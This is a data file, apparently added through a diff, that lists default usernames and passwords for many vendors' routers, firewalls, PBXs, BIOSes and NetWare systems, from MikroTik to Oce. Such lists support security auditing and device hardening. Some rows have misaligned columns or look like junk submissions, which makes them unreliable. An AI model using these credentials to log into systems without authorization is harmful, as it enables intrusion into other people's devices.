+mikrotik,webbox,2.9.6,bounce,admin,admin,bounce,12345, +mikrotik,windows xp,2.9.27,192.168.0.5,admin,18022011,root,, +mikrotik,windows xp,2.9.34,http://10.1.11.1,admin,admin,Admin,, +mikrotik,windows xp,webbox 2.9.27 login,192.168.2.1,admin,admin,root,, +milan,mil-sm801p,,Multi,root,root,Admin,, +minoltaqms,Magicolor 3100,3.0.0,HTTP,admin,,Admin,Gives access to Accounting, +minoltaqms,Magicolor 3100,3.0.0,HTTP,operator,,Admin,, +mintel,Mintel PBX,,,,SYSTEM,,, +mintel,Mintel PBX,,,,SYSTEM,Admin,, +mintel,Mintel PBX,,Admin,,SYSTEM,,, +mitel,3300 ICP,all,HTTP,system,password,Admin,, +mitel,MN3100ICP,,,system,mnet,,, +mitel,MN3100ICP,,HTTP,system,mnet,,, +mitel,SX200,All,Maint Port/attendant console,installer,1000,unlimited,This access controlls all other levels, +mitel,SX2000,all,Multi,,,Admin,, +mitel,sx2000,light,console,system,sx2000,Full installer,, +mklencke,Forumtalk,1.0rc2,,root,blablabla,Admin,, +mobotix,M10,,192.168.x.x,admin,meinsm,,, +mobotix,M10,,HTTP,admin,meinsm,192.168.x.x,, +mobotix,MOBOTIX M12,,http,admin,meinsm,http,, +mobotix,Windows XP,all versions,http://192.168.0.1,,ronda_atocha,guest,, +mobotix,abosalem,1,aaa,abosalem,1407,,, +motive,Chorus,,,admin,isee,Admin,, +motorola,Cablerouter,,,cablecom,router,,, +motorola,Cablerouter,,Admin,cablecom,router,,, +motorola,Cablerouter,,Telnet,cablecom,router,Admin,, +motorola,DPC-550 cell phone,,keypad,,000000000000,unlocks the phone,, +motorola,DPC-550 cell phone,,keypad,,123456123456,unlocks the phone,, +motorola,Motorola Cablerouter,,,cablecom,router,Admin,, +motorola,SB5120,,http://192.168.100.1,,,Administration,, +motorola,SBG900,,HTTP,admin,motorola,Admin,, +motorola,Various,,,service,smile,,, +motorola,Various,,,setup,,,, +motorola,WR850G Router,,,admin,password,,, +motorola,WR850G,4.03,HTTP,admin,motorola,Admin,higher revisions likely the same, +motorola,WR850R,,HTTP,admin,motorola,,, +motorola,Wireless Router,WR850G,HTTP,admin,motorola,Admin,, +motorola,vanguard,,Multi,,,Admin,, +motorola,wr850r,,,admin,motorola,,, +mp3mystic,MP3Mystic,,,admin,mp3mystic,,, +mp3mystic,MP3Mystic,,http,admin,mp3mystic,Admin,, +mro software,maximo,,Admin,SYSADM,sysadm,,, +mro software,maximo,,v4.1,SYSADM,sysadm,,, +mrosoftware,maximo,v4.1,Multi,SYSADM,sysadm,Admin,, +mrv,3312-4c,,Multi,admin,admin,all,, +mrv,3312-4c,,all,admin,admin,,, +mtechnology,PC BIOS,,Console,,mMmM,Admin,, +multitech,RASExpress Server,,,guest,,,5.30a, +mutare software,EVM Admin,,All,,admin,,, +mutaresoftware,EVM Admin,All,HTTP,,admin,Admin,, +muze,Ariadne,,2.2.1,admin,muze,,, +muze,Ariadne,2.2.1,http,admin,muze,Admin,, +my test,1.0,,You,Loser,1234,,, +mysql,Eventum,,,admin@example.com,admin,,, +mysql,Eventum,,http,admin@example.com,admin,Admin,, +mysql,MySQL,,,root,,,, +mysql,MySQL,all,,root,,Admin,, +nai,Entercept,,Management console,GlobalAdmin,GlobalAdmin,Admin, : must be changed at 1st connection, +nai,Intrushield IPS,1200/2600/4000,SSH + Web console,admin,admin123,Admin,, +nanoteq,NetSeq firewall,,,admin,NetSeq,,*, +nanoteq,NetSeq,,,admin,NetSeq,,, +ncr,NCR UNIX,,,ncrm,ncrm,,, +ncr,NCR UNIX,,Admin,ncrm,ncrm,,, +ncr,NCR UNIX,,Multi,ncrm,ncrm,Admin,, +nec,WARPSTAR-BaseStation,,Telnet,,,Admin,, +netapp,NetCache,,,admin,NetCache,,any, +netapp,SANscreen,5.1.3,http,admin,admin123,Admin,, +netbotz,Netbotz Appliances,,,netbotz,netbotz,,, +netcomm,NB1300+4,,,admin,password,,, +netcomm,NB1300+4,all,Multi,admin,password,,, +netcomm,NB1300,,,admin,password,,, +netcomm,NB1300,all,Multi,admin,password,,, +netcomm,NB5580 / NB5580W,,,,admin,Admin,Any user name (or blank) is valid with this password, +netcordia,NetMRI,,http,admin,admin,Admin,, +netgear fr314,Firewall router,,,admin,password,,, +netgear fr314,Firewall router,,Admin,admin,password,,, +netgear,802.11b Wireless Cable/DSL router,,MR814,admin,password,,, +netgear,CG814GCMR,,http://192.168.0.1,admin,password,admin,charter communications, +netgear,CG814WG,v2,192.168.0.1,comcast,1234,setup,, +netgear,Cable/DSL Router,,RT-314,admin,1234,,, +netgear,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics page,192.168.0.1/docsisdevicestatus.html, +netgear,DG632 ADSL Modem,V3.3.0a_cx,HTTP,admin,password,Admin,, +netgear,DG632,,http://192.168.0.1,admin,password,Administration,, +netgear,DG814 Router,,,admin,password,Admin,, +netgear,DG824G,,,admin,password,Admin,, +netgear,DG824M,,,admin,password,Admin,, +netgear,DG834,,http://192.168.0.1,admin,password,Administration,, +netgear,DG834G,,,,admin,Admin,, +netgear,DG834G,,,,zebra,,, +netgear,DG834G,,http://192.168.0.1,admin,password,Administration,, +netgear,DG834G,,telnet,,zebra,Admin,, +netgear,DG834GT,V1.03.87,http://192.168.0.1,,,root,, +netgear,DG934G,,,admin,sky,admin,, +netgear,DM602,,FTP Telnet and HTTP,admin,password,Admin,, +netgear,FM114P,,Multi,,,Admin,, +netgear,FR114P,,HTTP,admin,password,Admin,, +netgear,FR314,,HTTP,admin,password,Admin,, +netgear,FVS318,,HTTP,admin,password,Admin,, +netgear,FVS338,,HTTP,admin,password,Admin,, +netgear,FWG114P,,Multi,,admin,password,, +netgear,GS724t,V1.0.1_1104,HTTP,,password,Admin,, +netgear,GSM7224,,HTTP,admin,,Admin,, +netgear,ME102 ,,SNMP,,private,Admin,Standard IP-Address is 192.168.0.5, +netgear,MR-314,,3.26,admin,1234,,, +netgear,MR-314,,Admin,admin,1234,,, +netgear,MR-314,3.26,HTTP,admin,1234,Admin,, +netgear,MR314,,Multi,admin,1234,Admin,, +netgear,MR814,,HTTP,admin,password,Admin,, +netgear,RM356,,Admin,,1234,,, +netgear,RM356,,None,,1234,,, +netgear,RM356,None,Telnet,,1234,Admin,shutdown the router via internet, +netgear,RP114,,,admin,1234,,, +netgear,RP114,,3.26,,1234,,, +netgear,RP114,,Admin,admin,1234,,, +netgear,RP114,,Multi,admin,1234,admin,, +netgear,RP114,,Telnet,admin,1234,Admin,, +netgear,RP114,,admin,admin,1234,,, +netgear,RP114,3.20-3.26,HTTP,admin,1234,Admin,default http://192.168.0.1, +netgear,RP114,3.26,Telnet,,1234,Admin,telnet 192.168.0.1, +netgear,RP614,,,admin,password,,, +netgear,RP614,,Admin,admin,password,,, +netgear,RP614,,HTTP,admin,password,Admin,, +netgear,RT-311,,Admin,Admin,1234,,, +netgear,RT-311,,HTTP,Admin,1234,Admin,, +netgear,RT311,,,Admin,1234,,Any, +netgear,RT311/RT314,,,admin,1234,,, +netgear,RT314,,,admin,admin,,, +netgear,RT314,,Admin,admin,1234,,, +netgear,RT314,,Admin,admin,admin,,, +netgear,RT314,,HTTP and Telnet,admin,1234,Admin,, +netgear,RT314,,HTTP,admin,admin,Admin,, +netgear,Router,,DG814,admin,password,,, +netgear,Router/Modem,,Multi,admin,password,Admin,, +netgear,WAP54G,,,,admin,Admin,, +netgear,WG302,,,admin,password,,, +netgear,WG302,,HTTP,admin,password,,, +netgear,WG602 Router,2,,admin,password,,, +netgear,WG602,,Firmware Version 1.04.0,super,5777364,,, +netgear,WG602,,Firmware Version 1.5.67,super,5777364,,, +netgear,WG602,,Firmware Version 1.7.14,superman,21241036,,, +netgear,WG602,Firmware Version 1.04.0,HTTP,super,5777364,Admin,, +netgear,WG602,Firmware Version 1.5.67,HTTP,super,5777364,Admin,, +netgear,WG602,Firmware Version 1.7.14,HTTP,superman,21241036,Admin,, +netgear,WGE101,,,admin,password,Admin,, +netgear,WGR-614,,admin,admin,password,,, +netgear,WGR101 Router,,,admin,password,,, +netgear,WGR614 Router,v4,,admin,setup,Admin,, +netgear,WGR614,v5,http://192.168.0.1 or http://routerlogin.net/,admin,password,Administration,, +netgear,WGR624 Router,,,admin,password,,, +netgear,WGT624,,http://192.168.0.1,admin,password,Administration,, +netgear,WGT634U,,HTTP,admin,password,Admin,, +netgear,wpn824,,,edel,1234567,,, +netgeatr,RP114,,3.20-3.26,admin,1234,,, +netgenesis,NetAnalysis Web Reporting,,,naadmin,naadmin,,, +netgenesis,NetAnalysis Web Reporting,,Admin,naadmin,naadmin,,, +netgenesis,NetAnalysis Web Reporting,,HTTP,naadmin,naadmin,Admin,, +netopia,3351,,Multi,,,Admin,, +netopia,4542,,Multi,admin,noway,Admin,, +netopia,Caiman 3200,3200,http://192.168.1.1,admin,1234,,, +netopia,Netopia 7100,,,,,,, +netopia,Netopia 7100,,Admin,,,,, +netopia,Netopia 7100,,Telnet,,,Admin,, +netopia,Netopia 9500,,,netopia,netopia,,, +netopia,Netopia 9500,,Admin,netopia,netopia,,, +netopia,Netopia 9500,,Telnet,netopia,netopia,Admin,, +netopia,R7100,,,admin,admin,,4.6.2, +netopia,R910,,Multi,admin,,Admin,, +netport,Express 10/100,,,setup,setup,,, +netport,Express 10/100,,Admin,setup,setup,,, +netport,Express 10/100,,multi,setup,setup,Admin,, +netscape,Enterprise Server,,http,admin,admin,Admin,, +netscape,Netscape Enterprise Server,,,admin,admin,,, +netscreen,Firewall,,,netscreen,netscreen,,, +netscreen,Firewall,,Admin,netscreen,netscreen,,, +netscreen,Firewall,,multi,netscreen,netscreen,Admin,, +netscreen,IDP,,2.0p1,admin,netscreen,,, +netscreen,IDP,2.0p1,,admin,netscreen,Admin,, +netscreen,NS-5 NS10 NS-100,,,netscreen,netscreen,,, +netscreen,Netscreen,,,netscreen,netscreen,,, +netscreen,all firewalls,,all,netscreen,netscreen,,, +netscreen,firewall,,HTTP,Administrator,,Admin,, +netscreen,firewall,,Telnet,Administrator,,Admin,, +netscreen,firewall,,Telnet,admin,,Admin,, +netscreen,firewall,,Telnet,operator,,Admin,, +netscreen,ns-25,,,,,,, +netscreen,ns-25,,Admin,,,,, +netscreen,ns-25,,Multi,,,Admin,, +netstar,Netpilot,,Multi,admin,password,Admin,, +network appliance,NetCache,,Admin,admin,NetCache,,, +network appliance,NetCache,,any,admin,NetCache,,, +network associates,WebShield Security Appliance e250,,,e250,e250changeme,,, +network associates,WebShield Security Appliance e250,,Admin,e250,e250changeme,,, +network associates,WebShield Security Appliance e500,,,e500,e500changeme,,, +network associates,WebShield Security Appliance e500,,Admin,e500,e500changeme,,, +networkappliance,NetCache,any,Multi,admin,NetCache,Admin,, +networkassociates,WebShield Security Appliance e250,,HTTP,e250,e250changeme,Admin,, +networkassociates,WebShield Security Appliance e500,,HTTP,e500,e500changeme,Admin,, +networkeverywhere,NWR11B,,HTTP,,admin,Admin,, +networkice,ICECap Manager,,2.0.22 <,iceman,,,, +networkice,ICECap Manager,below 2.0.22,port 8081,iceman,,Admin,, +newbridge,Congo/Amazon/Tigris,,,netman,netman,,All versions, +nexland,ISB SOHO,,http://192.168.0.1,admin,,Administration,, +nexland,ISB2LAN,,http://192.168.0.1,user:,,Administration,, +nexland,Pro100,,http://192.168.0.1,user:,,Administration,, +nexland,Pro400,,http://192.168.0.1,user:,,Administration,, +nexland,Pro800 Turbo,,http://192.168.0.1,admin,,Administration,, +nexsan,ATABoy2F,8.10f,http,ADMIN,PASSWORD,Admin,, +next,NeXTStep,,,me,,,, +next,NeXTStep,,,root,NeXT,,, +next,NeXTStep,,,signa,signa,,, +next,NeXTStep,,Admin,root,NeXT,,, +next,NeXTStep,,Multi,me,,User,, +next,NeXTStep,,Multi,root,NeXT,Admin,, +next,NeXTStep,,Multi,signa,signa,User,, +next,NeXTStep,,User,me,,,, +next,NeXTStep,,User,signa,signa,,, +ngsec,NGSecureWeb,,HTTP,admin,,Admin,, +ngsec,NGSecureWeb,,HTTP,admin,asd,Admin,, +ngsecure,The Hooy,,1,admin,admin,,, +ngsecure,The Hooy,,Admin,admin,admin,,, +nicesystemsltd,NICELog,,,Administrator,nicecti,Admin,, +nicesystemsltd,NICELog,,,Nice-admin,nicecti,Admin,, +niksun,NetDetector,,Multi,vcr,NetVCR,Admin,su after login with empty password, +nimble,BIOS,,Console,,xdfk9874t3,Admin,, +nimble,PC BIOS,,,,xdfk9874t3,,, +nimble,PC BIOS,,Admin,,xdfk9874t3,,, +nimble,PC BIOS,,Console,,xdfk9874t3,Admin,, +nixdorf,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,, +no,no,,microsoft,9000,1234567890,,, +nokia,7360,,Multi,,9999,Admin,, +nokia,770,,,root,rootme,Admin,, +nokia,DSL Router M1122,,1.1 - 1.2,m1122,m1122,,, +nokia,DSL Router M1122,,Administrator,Telecom,Telecom,,, +nokia,DSL Router M1122,,Multi,Telecom,Telecom,Administrator,, +nokia,DSL Router M1122,,User,m1122,m1122,,, +nokia,DSL Router M1122,1.1 - 1.2,Multi,m1122,m1122,User,, +nokia,M10,,,Telecom,Telecom,,, +nokia,MW1122,,Multi,telecom,telecom,Admin,Only in New Zealand., +nokia,all mobiles,,Security Code,nop,12345,,, +nokia,all mobiles,nop,Multi,nop,12345,Security Code,, +nokia,most Nokia cell phones,all,except some of newest models,*3001#12345#,,, can be reset., +nokia,n800,all,ssh (remote or localhost),root,rootme,root user,by default ssh not installed, +nokia,nokia,,,root,nokia,,, +nokia,nokia,,security code,nop,123454,,, +nokia,phone,,voicemail,client,client,,, +norstar,Meridian KSU,,Admin,**23646,23646,,, +norstar,Meridian KSU,,Config,**266344,266344,,, +nortel,Accelar (Passport) 1000 series routing switches,,,l2,l2,,, +nortel,Accelar (Passport) 1000 series routing switches,,,l3,l3,,, +nortel,Accelar (Passport) 1000 series routing switches,,,ro,ro,,, +nortel,Accelar (Passport) 1000 series routing switches,,,rw,rw,,, +nortel,Accelar (Passport) 1000 series routing switches,,,rwa,rwa,,, +nortel,Accelar (Passport) 1000 series routing switches,,Layer 2 Read Write,l2,l2,,, +nortel,Accelar (Passport) 1000 series routing switches,,Layer 3 (and layer 2) Read Write,l3,l3,,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,l2,l2,Layer 2 Read Write,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,l3,l3,Layer 3 (and layer 2) Read Write,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,ro,ro,Read Only,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,rw,rw,Read Write,, +nortel,Accelar (Passport) 1000 series routing switches,,Multi,rwa,rwa,Read Write All,, +nortel,Accelar (Passport) 1000 series routing switches,,Read Only,ro,ro,,, +nortel,Accelar (Passport) 1000 series routing switches,,Read Write All,rwa,rwa,,, +nortel,Accelar (Passport) 1000 series routing switches,,Read Write,rw,rw,,, +nortel,BCM,,3.5 - 3-7,administrator,PlsChgMe!,,, +nortel,BCM,,3.5 - 3-7,supervisor,visor,,, +nortel,BayStack,,310/303,,secure,,, +nortel,Baystack 350-24T,,,,secure,,, +nortel,Baystack 350-24T,,Admin,,secure,,, +nortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RO,user,Read Only,, +nortel,Baystack or Etherswitch 460/470/5500,,SNMP or Java Device Manager,RW,secure,Admin,, +nortel,Baystack,310/303,,,,Admin,, +nortel,Baystack,310/303,,,secure,Admin,, +nortel,Baystack,350-24T,Telnet,,secure,Admin,, +nortel,Business Communications Manager,3.5 and 3.6,https,supervisor,PlsChgMe!,Admin,Note exclamation in password, +nortel,Business Communications Manager,3.5-3.7,,administrator,PlsChgMe!,Admin,Note exclamation in password, +nortel,Business Communications Manager,3.5-3.7,,supervisor,visor,Admin,, +nortel,Contivity Extranet Switches,2.x,,admin,setup,,, +nortel,Contivity Switch,,,admin,setup,,, +nortel,Contivity,,Admin,admin,setup,,, +nortel,Contivity,,Extranet/VPN switches,admin,setup,,, +nortel,Contivity,Extranet/VPN switches,HTTP,admin,setup,Admin,, +nortel,Extranet Switches,,,admin,setup,,, +nortel,Extranet Switches,,Admin,admin,setup,,, +nortel,Extranet Switches,,Multi,admin,setup,Admin,, +nortel,MIPCD,1.04,,user,,Admin,, +nortel,MIPCD,1.04,FTP,user,user,r/w,, +nortel,MIPCD,1.04,http,admin,admin,Admin,, +nortel,MIPCD,1.5,,,,,, +nortel,MIPCD,1.5,,user,,Admin,, +nortel,MIPCD,1.5,,user,user,,, +nortel,MIRAN,,,distrib,distrib0,Admin,, +nortel,MIRAN,,,user,user0000,Admin,, +nortel,MIRAN,3.xx,serial,admin,admin000,Admin,, +nortel,Matra 6501 PBX,,,,0,,, +nortel,Matra 6501 PBX,,Admin,,0000,,, +nortel,Matra 6501 PBX,,Console,,0,Admin,, +nortel,Matra 6501 PBX,,Console,,0000,Admin,, +nortel,Meridian 1 PBX,,,0,0,,OS Release 2, +nortel,Meridian CCR,,,ccrusr,ccrusr,,, +nortel,Meridian CCR,,,disttech,4tas,,, +nortel,Meridian CCR,,,maint,maint,,, +nortel,Meridian CCR,,,service,smile,,, +nortel,Meridian CCR,,Maintenance account,maint,maint,,, +nortel,Meridian CCR,,Multi,disttech,4tas,engineer account,, +nortel,Meridian CCR,,Multi,disttech,etas,engineer account,, +nortel,Meridian CCR,,Multi,maint,maint,Maintenance account,, +nortel,Meridian CCR,,Multi,service,smile,general engineer account,, +nortel,Meridian CCR,,User account,ccrusr,ccrusr,,, +nortel,Meridian CCR,,engineer account,disttech,4tas,,, +nortel,Meridian CCR,,general engineer account,service,smile,,, +nortel,Meridian CCR,,telnet/modem,ccrusr,ccrusr,User account,, +nortel,Meridian CCR,,telnet/modem,mlusr,mlusr,user account,, +nortel,Meridian CCR,,telnet/modem,trmcnfg,trmcnfg,,, +nortel,Meridian KSU,,Console,**23646,23646,Admin,, +nortel,Meridian KSU,,Console,**266344,266344,Config,, +nortel,Meridian Link,,,disttech,4tas,,, +nortel,Meridian Link,,,maint,maint,,, +nortel,Meridian Link,,,mlusr,mlusr,,, +nortel,Meridian Link,,,service,smile,,, +nortel,Meridian Link,,Maintenance account,maint,maint,,, +nortel,Meridian Link,,Multi,disttech,4tas,engineer account,, +nortel,Meridian Link,,Multi,disttech,etas,engineer account,, +nortel,Meridian Link,,Multi,maint,maint,Maintenance account,, +nortel,Meridian Link,,Multi,service,smile,general engineer account,, +nortel,Meridian Link,,engineer account,disttech,4tas,,, +nortel,Meridian Link,,general engineer account,service,smile,,, +nortel,Meridian Link,,telnet/modem,ccrusr,ccrusr,User account,, +nortel,Meridian Link,,telnet/modem,mlusr,mlusr,user account,, +nortel,Meridian Link,,telnet/modem,trmcnfg,trmcnfg,,, +nortel,Meridian Link,,user account,mlusr,mlusr,,, +nortel,Meridian Link/CCR/Max,,,ccrusr,ccrusr,,, +nortel,Meridian Link/CCR/Max,,,disttech,4tas,,, +nortel,Meridian Link/CCR/Max,,,disttech,disttech,,, +nortel,Meridian Link/CCR/Max,,,maint,maint,,, +nortel,Meridian Link/CCR/Max,,,mlusr,mlusr,,, +nortel,Meridian Link/CCR/Max,,,service,smile,,, +nortel,Meridian Link/CCR/Max,,,trmcnfg,trmcnfg,,, +nortel,Meridian MAX,,,maint,ntacdmax,,, +nortel,Meridian MAX,,,root,3ep5w2u,,, +nortel,Meridian MAX,,,service,smile,,, +nortel,Meridian MAX,,Admin,root,3ep5w2u,,, +nortel,Meridian MAX,,Maintenance account,maint,ntacdmax,,, +nortel,Meridian MAX,,general engineer account,service,smile,,, +nortel,Meridian Mail,10.xx,AX in serial,admin,admin,Admin,, +nortel,Meridian Mail,13.xx,AX in serial,system,adminpwd,Admin,, +nortel,Meridian Max,,Multi,maint,maint,Maintenance account,, +nortel,Meridian Max,,Multi,maint,ntacdmax,Maintenance account,, +nortel,Meridian Max,,Multi,root,3ep5w2u,Admin,, +nortel,Meridian Max,,Multi,service,smile,general engineer account,, +nortel,Meridian Max,,telnet/modem,disttech,4tas,,, +nortel,Meridian Max,,telnet/modem,disttech,etas,,, +nortel,Meridian Max,,telnet/modem,mlusr,mlusr,user account,, +nortel,Meridian Max,,telnet/modem,trmcnfg,trmcnfg,,, +nortel,Meridian Max,,telnet/moden,ccrusr,ccrusr,User account,, +nortel,Meridian PBX,,,login,0,,, +nortel,Meridian PBX,,,login,0000,,, +nortel,Meridian PBX,,,login,1111,,, +nortel,Meridian PBX,,,login,8429,,, +nortel,Meridian PBX,,,spcl,0,,, +nortel,Meridian PBX,,,spcl,0000,,, +nortel,Meridian PBX,,Serial,login,0,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,login,0000,,, +nortel,Meridian PBX,,Serial,login,1111,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,login,8429,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,spcl,0,,AUTH codes in LD 8, +nortel,Meridian PBX,,Serial,spcl,0000,,, +nortel,Meridian,,,,,,, +nortel,Meridian,,Admin,,,,, +nortel,Meridian,,Multi,,,Admin,, +nortel,Millennium,,keypad while hung up,,2727378,Maintenance,, +nortel,Norstar Modular ICS,,,**ADMIN (**23646),ADMIN (23646),,Any, +nortel,Norstar Modular ICS,,,**CONFIG (266344),CONFIG (266344),,Any, +nortel,Norstar,,Console,266344,266344,Admin,, +nortel,Phone System,All,From Phone,,266344,Installers,, +nortel,Remote Office 9150,,,admin,root,,, +nortel,Remote Office 9150,,Admin,admin,root,,, +nortel,Remote Office 9150,,Client,admin,root,Admin,, +nortel,Shasta,,,admin,admin,,any, +nortel,Symposium,,,sysadmin,nortel,,, +nortel,Symposium,,,sysadmin,nortel,Admin,, +nortel,dms,,Multi,,,Admin,, +nortel,p8600,,Multi,,,Admin,, +novell,Groupwise 5.5 Enhancement Pack,,,servlet,manager,,, +novell,Groupwise 6.0,,,servlet,manager,,, +novell,Groupwise,,5.5 Enhancement Pack,servlet,manager,,, +novell,Groupwise,,6,servlet,manager,,, +novell,Groupwise,,Servlet Mgr,servlet,manager,,, +novell,Groupwise,5.5 Enhancement Pack,HTTP,servlet,manager,Servlet Mgr,, +novell,Groupwise,6.0,HTTP,servlet,manager,Servlet Mgr,, +novell,NDS iMonitor,,,sadmin,,,, +novell,NDS iMonitor,,http,sadmin,,Admin,, +novell,NetWare,,,BACKUP,,,Any, +novell,NetWare,,,CHEY_ARCHSVR,WONDERLAND,,Arcserve, +novell,NetWare,,,GATE,,,Any, +novell,NetWare,,,GATEWAY,,,Any, +novell,NetWare,,,HPLASER,,,Any, +novell,NetWare,,,LASER,,,Any, +novell,NetWare,,,LASERWRITER,,,Any, +novell,NetWare,,,MAIL,,,Any, +novell,NetWare,,,POST,,,Any, +novell,NetWare,,,PRINT,,,any, +novell,NetWare,,,PRINTER,,,Any, +novell,NetWare,,,ROUTER,,,Any, +novell,NetWare,,,WINDOWS_PASSTHRU,,,Any, +novell,NetWare,,,guest,,,Any, +novell,Netware,,,ADMIN,,,, +novell,Netware,,,ADMIN,ADMIN,,, +novell,Netware,,,ARCHIVIST,,,, +novell,Netware,,,ARCHIVIST,ARCHIVIST,,, +novell,Netware,,,BACKUP,,,, +novell,Netware,,,BACKUP,BACKUP,,, +novell,Netware,,,CHEY_ARCHSVR,,,, +novell,Netware,,,CHEY_ARCHSVR,CHEY_ARCHSVR,,, +novell,Netware,,,FAX,,,, +novell,Netware,,,FAX,FAX,,, +novell,Netware,,,FAXUSER,,,, +novell,Netware,,,FAXUSER,FAXUSER,,, +novell,Netware,,,FAXWORKS,,,, +novell,Netware,,,FAXWORKS,FAXWORKS,,, +novell,Netware,,,GATEWAY,,,, +novell,Netware,,,GATEWAY,GATEWAY,,, +novell,Netware,,,GUEST,,,, +novell,Netware,,,GUEST,GUEST,,, +novell,Netware,,,GUEST,GUESTGUE,,, +novell,Netware,,,GUEST,GUESTGUEST,,, +novell,Netware,,,GUEST,TSEUG,,, +novell,Netware,,,HPLASER,,,, +novell,Netware,,,HPLASER,HPLASER,,, +novell,Netware,,,LASER,,,, +novell,Netware,,,LASER,LASER,,, +novell,Netware,,,LASERWRITER,,,, +novell,Netware,,,LASERWRITER,LASERWRITER,,, +novell,Netware,,,MAIL,,,, +novell,Netware,,,MAIL,MAIL,,, +novell,Netware,,,POST,,,, +novell,Netware,,,POST,POST,,, +novell,Netware,,,PRINT,,,, +novell,Netware,,,PRINT,PRINT,,, +novell,Netware,,,PRINTER,,,, +novell,Netware,,,PRINTER,PRINTER,,, +novell,Netware,,,ROOT,,,, +novell,Netware,,,ROOT,ROOT,,, +novell,Netware,,,ROUTER,,,, +novell,Netware,,,SABRE,,,, +novell,Netware,,,SUPERVISOR,,,, +novell,Netware,,,SUPERVISOR,HARRIS,,, +novell,Netware,,,SUPERVISOR,NETFRAME,,, +novell,Netware,,,SUPERVISOR,NF,,, +novell,Netware,,,SUPERVISOR,NFI,,, +novell,Netware,,,SUPERVISOR,SUPERVISOR,,, +novell,Netware,,,SUPERVISOR,SYSTEM,,, +novell,Netware,,,TEST,,,, +novell,Netware,,,TEST,TEST,,, +novell,Netware,,,USER_TEMPLATE,,,, +novell,Netware,,,USER_TEMPLATE,USER_TEMPLATE,,, +novell,Netware,,,WANGTEK,,,, +novell,Netware,,,WANGTEK,WANGTEK,,, +novell,Netware,,,WINDOWS_PASSTHRU,,,, +novell,Netware,,,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,, +novell,Netware,,,WINSABRE,SABRE,,, +novell,Netware,,,WINSABRE,WINSABRE,,, +novell,Netware,,Multi,ADMIN,,,, +novell,Netware,,Multi,ADMIN,ADMIN,,, +novell,Netware,,Multi,ARCHIVIST,,,, +novell,Netware,,Multi,ARCHIVIST,ARCHIVIST,,, +novell,Netware,,Multi,BACKUP,,,, +novell,Netware,,Multi,BACKUP,BACKUP,,, +novell,Netware,,Multi,CHEY_ARCHSVR,,,, +novell,Netware,,Multi,CHEY_ARCHSVR,CHEY_ARCHSVR,,, +novell,Netware,,Multi,FAX,,,, +novell,Netware,,Multi,FAX,FAX,,, +novell,Netware,,Multi,FAXUSER,,,, +novell,Netware,,Multi,FAXUSER,FAXUSER,,, +novell,Netware,,Multi,FAXWORKS,,,, +novell,Netware,,Multi,FAXWORKS,FAXWORKS,,, +novell,Netware,,Multi,GATEWAY,,,, +novell,Netware,,Multi,GATEWAY,GATEWAY,,, +novell,Netware,,Multi,GUEST,,,, +novell,Netware,,Multi,GUEST,GUEST,,, +novell,Netware,,Multi,GUEST,GUESTGUE,,, +novell,Netware,,Multi,GUEST,GUESTGUEST,,, +novell,Netware,,Multi,GUEST,TSEUG,,, +novell,Netware,,Multi,HPLASER,,,, +novell,Netware,,Multi,HPLASER,HPLASER,,, +novell,Netware,,Multi,LASER,,,, +novell,Netware,,Multi,LASER,LASER,,, +novell,Netware,,Multi,LASERWRITER,,,, +novell,Netware,,Multi,LASERWRITER,LASERWRITER,,, +novell,Netware,,Multi,MAIL,,,, +novell,Netware,,Multi,MAIL,MAIL,,, +novell,Netware,,Multi,POST,,,, +novell,Netware,,Multi,POST,POST,,, +novell,Netware,,Multi,PRINT,,,, +novell,Netware,,Multi,PRINT,PRINT,,, +novell,Netware,,Multi,PRINTER,,,, +novell,Netware,,Multi,PRINTER,PRINTER,,, +novell,Netware,,Multi,ROOT,,,, +novell,Netware,,Multi,ROOT,ROOT,,, +novell,Netware,,Multi,ROUTER,,,, +novell,Netware,,Multi,SABRE,,,, +novell,Netware,,Multi,SUPERVISOR,,,, +novell,Netware,,Multi,SUPERVISOR,HARRIS,,, +novell,Netware,,Multi,SUPERVISOR,NETFRAME,,, +novell,Netware,,Multi,SUPERVISOR,NF,,, +novell,Netware,,Multi,SUPERVISOR,NFI,,, +novell,Netware,,Multi,SUPERVISOR,SUPERVISOR,,, +novell,Netware,,Multi,SUPERVISOR,SYSTEM,,, +novell,Netware,,Multi,TEST,,,, +novell,Netware,,Multi,TEST,TEST,,, +novell,Netware,,Multi,USER_TEMPLATE,,,, +novell,Netware,,Multi,USER_TEMPLATE,USER_TEMPLATE,,, +novell,Netware,,Multi,WANGTEK,,,, +novell,Netware,,Multi,WANGTEK,WANGTEK,,, +novell,Netware,,Multi,WINDOWS_PASSTHRU,,,, +novell,Netware,,Multi,WINDOWS_PASSTHRU,WINDOWS_PASSTHRU,,, +novell,Netware,,Multi,WINSABRE,SABRE,,, +novell,Netware,,Multi,WINSABRE,WINSABRE,,, +novell,iChain,,1.5,,san fran 8,,, +novell,iChain,,2,,cr0wmt 911,,, +novell,iChain,,Admin,,cr0wmt 911,,, +novell,iChain,,Admin,,san fran 8,,, +novell,iChain,1.5,Console,,san fran 8,Admin,, +novell,iChain,2.0,Console,,cr0wmt 911,Admin,, +novell,iChain/ICS,,1.2 2.0,,root,,, +novell,iChain/ICS,,Admin,,root,,, +novell,iChain/ICS,1.2 2.0,Telnet,,root,Admin,, +novell,iManager,,2.0.1,admin,novell,,, +novell,iManager,2.0.1,,,admin,novell,, +nrg,DSC338 Printer,1.19,HTTP,,password,Admin,no user, +nrg,SP C312DN,1.03,,Admin,,Administrator,, +nsi,vmXfw,,,root,nsi,Admin,, +nullsoft,Shoutcast,1.9.5,PLS,admin,changeme,Admin,, +nurit,PC BIOS,,,$system,,,, +nurit,PC BIOS,,Admin,$system,,,, +nurit,PC BIOS,,Console,$system,,Admin,, +oce,Printers,,Admin,,0 and the number of OCE printer,,, +oce,Printers,Hardware,HTTP,,0 and the number of OCE printer,Admin,, +oce,TCS500,All Versions,Console,oceservice,ser4OCE!,Technical/Admin,Reboot for normal user mode., +oce,TDS300,ALL,Direct,guest,RtFM!,,, 